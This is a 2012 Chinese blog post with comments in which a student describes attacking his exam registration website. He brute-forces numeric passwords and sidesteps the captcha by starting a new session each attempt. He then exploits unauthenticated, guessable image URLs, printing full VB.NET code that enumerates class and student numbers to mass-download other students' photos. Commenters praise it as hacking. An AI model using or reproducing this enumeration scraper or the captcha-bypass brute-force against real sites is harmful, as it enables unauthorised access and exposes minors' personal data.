需要上这个网站, 顺便吐糟一下。
这个网站将动态网页的扩展名改成了 .a(abcdefgh.a) 但是我从HTTP头
HTTP/1.1 200 OK ... X-Powered-By: Servlet/2.5 JSP/2.1
发现是用JSP编写的。
由于号和默认的密码都是数字, 且密码是8位, 而且改密码的时候只能修改为包含字母或数字的密码, 所以比较不安全。
于是我写了一个破解密码的机器, 用了一天时间, 还没破解成功。
它的验证码是当你输入几次错误的用户名和密码才出现的, 但是我写的破解机每次得到一个新的Session号, 就相当于每次第一次登陆, 可以无视验证码。
由于效率低下, 源代码不予公开。
另外, 我学会了使用正则表达式。
【Update!2012.2.18】
经测试, 这东西只是作为技术研究, 我用这东西破解我的报名号+1的号, 一天都没成功呃..
【Update!2012.2.19】
可以不用登陆而通过地址获取到照片。
如:
http://__.__.__.__:/00/0000/0000000班级号学生号.JPG
写程序一个用于获取照片:
Imports System.IO
Imports System.Net
Module Module1
Sub Main()
Using wc As New WebClient
Dim Save = "N:\Ps\"
For i = 1 To 20
For j = 1 To 99
Try
Dim cls
cls = i.ToString
cls = StrDup(2 - cls.Length, "0") & cls
Dim no
no = j.ToString
no = StrDup(2 - no.Length, "0") & no
Console.Write(cls & " " & no & "...")
If Not Directory.Exists(Path.Combine(Save, cls)) Then
Directory.CreateDirectory(Path.Combine(Save, cls))
End If
Dim fn = Path.Combine(Path.Combine(Save, cls), "00000000" & cls & no & ".JPG")
wc.DownloadFile("http://__.__.__.__:/00/0000/0000000" & cls & no & ".JPG", fn)
Console.WriteLine("ok")
Catch ex As Exception
Console.WriteLine(ex.ToString)
End Try
Next
Next
End Using
Console.ReadKey()
End Sub
End Module
经过获取统计, 有725人参加中考。
我以为我们年级有16个班但是发现有17个班。
其实还有照片,是根据你的学校代码以及班号学号弄得。。可以查看任何人的照片- -#
已添加
Orz…
前天看了英国小学生把学校网站入侵了,今天就看到中国初中生把教育局网站破解了!!!
:neutral: 我可没破解…
22越来越牛了!
/惊恐